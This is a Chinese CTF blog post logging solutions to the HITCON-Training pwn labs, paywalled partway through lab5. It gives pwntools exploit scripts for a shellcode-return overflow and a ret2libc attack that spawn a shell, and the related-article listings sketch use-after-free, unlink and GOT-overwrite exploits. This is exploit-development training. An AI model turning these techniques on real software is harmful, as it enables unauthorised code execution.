HITCON-trainning&寒假做题记录

最新推荐文章于 2023-09-14 20:43:20 发布
最新推荐文章于 2023-09-14 20:43:20 发布
阅读量663 收藏
点赞数
分类专栏: pwn 文章标签: pwn hitocn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/86671557
版权

HITCON-trainning

2019.1.27
是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7
题目地址:https://github.com/scwuaptx/HITCON-Training

lab1

比较简单的逆向题这里就不贴代码了,就是一个疑惑解码

lab2

一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么

lab3

ret2sc

原理比较简单就是输入shellcode然后ret到我们shellcode所在的地方

from pwn import*
context(os='linux', arch='i386', log_level='debug')
p = process('./ret2sc')

payload = shellcraft.sh()
raw_input()
p.recvuntil('Name:')
p.sendline(asm(payload))
p.recvuntil(':')
payload2 = 'a'*32+p32(0x804A060)
p.send(payload2)

p.interactive()

lab4

ret2lib

一个天然的给你的泄漏地址的函数,利用这个地址可以计算出偏移然后就可以getshell,这里我没有用onegadget,原来是想用的找不到我64位下32的libc文件了,所以用了lib函数来调用

from pwn import*
context(os='linux', arch='i386', log_level='debug')
p = process('./ret2lib')
a = ELF('./ret2lib')
e = a.libc
pay = 0x804A01C
p.recvuntil('Give me an address (in dec) :')
p.sendline(str(int(pay)))
p.recvuntil(':')
libc = int(p.recvuntil('\n')[1:11],16) - e.symbols['puts']
one = libc + e.symbols['system']
raw_input()
p.recvuntil('Leave some message for me :')
p.sendline('a'*0x3c+p32(one)+'bbbb'+p32(int(e.search('/bin/sh').next())+libc))

p.interactive()

lab5

simplerop

一个比较简单的rop,很明显的栈溢出漏洞,利用gadget搜索 ropchain然后就可以找到可以利用的rop,首先布置/bin/sh的地址然后在调用int0x80在进行系统调用。

from pwn import*

context(os='linux', arch='i386', log_level='debug')
p = process('./simplerop')
a = ELF('./simplerop')
e =
最低0.47元/天 解锁文章
Peanuts_CTF
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
HITCON-Training-master lab2 wp
zszcr的博客
04-03 671
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 259
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 708
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
hitcontraining_playfmt
最新发布
qq_62887641的博客
09-14 93
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay年度报告》是一份由台湾黑客协会HITCON组织发布的年度安全研究报告,重点关注了安全研究、安全开发以及渗透测试等领域。该报告的发布旨在促进安全专家与企业之间的沟通与合作,共同营造一个良好的...
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Training-master lab5 wp
zszcr的博客
04-07 369
程序防护机制:开启了NX堆栈不可执行查看了下ida反编译的代码可以发现主函数十分简单,但是程序里却又十分多的函数,说明这是静态链接编译的程序要求输入一局话,可以发现在read函数处有明显的栈溢出漏洞,buf大小是20 ,但是read函数读取100个字节的数据我一开始是想直接用ROPgadget生成ropchain的,但是尝试过发现,它可以溢出的空间不足以放下ROPgadget生成的ropchain...
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 358
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
hitcontraining_uaf
z1r0的博客
12-10 1542
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
HITCON-Training lab8(格式化字符串写漏洞)
像初雪一样自由洒落
03-28 328
还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,, 先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,, 顺便计算下偏移,反正都会用到 偏移是7 方法一 最简单的...
HITCON-training lab10 wp
qq_43409582的博客
01-30 1652
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
CTF|HITCON-Training-master lab5 writeup(ret2syscall题型)
skyattractive的博客
06-12 380
CTF|HITCON-Training-master lab5 writeup 题目的文件名是“simplerop” 意思是对rop链的简单利用 shift+f12 查看后,题目既没有给system函数又没有‘/bin/sh’ 大致判断是CTFwiki上基本rop中的ret2syscall类型的题目 大致思路是, 在文件中需寻找有用的gadget 通过题目中存在的栈溢出 将‘/bin/sh’写入文件中的bss段(或者data段) 然后将执行流引导到bss上执行即可 因为文件是32位,‘/bin/sh’需
暑假集训——Hitcon_Trainning——lab6_migration——栈迁移
qq_41667316的博客
07-11 485
migration 第一次 漏洞 栈溢出 这里的buf溢出了0x40-0x28 个字节 checksec比较友好,没有开地址随机化。 解决 是一个ret2libc的题目,返回到puts打印libc_start_main的got表地址,确定libc的版本。 这里有一个问题就是我不知道这个count如果在我返回到libc_start_main的话是不是会被初始化,我先试一下。 然后计算sys...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 849
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
hitcontraining_bamboobox的wp
wuyvle的博客
03-16 1160
是个堆题 add函数 change函数 没有判断大小可以进行unlink操作 伪造一个空闲 chunk。 通过 unlink 把 chunk 移到存储 chunk 指针的内存处。 覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。 覆盖 atoi 的 got 表为 system 函数地址。 给出参数 ‘sh’,调用 atoi 函数拿 shell。 add(0x40,b'a' * 8) add(0x80,b'b' * 8) add(0x80,b'c' * 8) ptr = 0x6020
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值